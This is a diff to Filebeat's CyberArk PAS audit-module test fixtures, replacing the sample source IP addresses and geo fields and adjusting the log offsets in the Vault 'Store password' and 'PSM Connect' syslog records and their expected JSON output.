+<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
 <5>1 2021-03-10T23:39:25Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 15:39:25","IsoTimestamp":"2021-03-10T23:39:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating 
System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountB"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"24"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615419536"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614868762"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"2"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-14T11:48:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 04:48:26\n 2021-03-14T11:48:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Groups\\WindowsGroup\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 04:48:26","IsoTimestamp":"2021-03-14T11:48:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615722505"},{"Name":"CurrInd","Value":"2"}]}}}} <5>1 2021-03-15T10:12:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:21\n 2021-03-15T10:12:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:21","IsoTimestamp":"2021-03-15T10:12:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"27"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615754905"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1615231204"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json
index 1e1ee0d8496c..5fa08fdb5afd 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json
@@ -208,7 +208,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 09:58:06",
 "event.action": "store password",
 "event.code": "294",
@@ -228,19 +228,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -257,7 +254,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:17:26",
 "event.action": "store password",
 "event.code": "294",
@@ -270,25 +267,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4455,
+ "log.offset": 4454,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -335,7 +330,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5053,
+ "log.offset": 5051,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
@@ -383,7 +378,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 6472,
+ "log.offset": 6470,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
@@ -442,7 +437,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 8761,
+ "log.offset": 8759,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
@@ -499,7 +494,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 12415,
+ "log.offset": 12413,
 "log.syslog.priority": "5",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log
index 74928df0a234..1781ee46b466 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log
@@ -1,17 +1,17 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"300","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM 
Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n 
Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
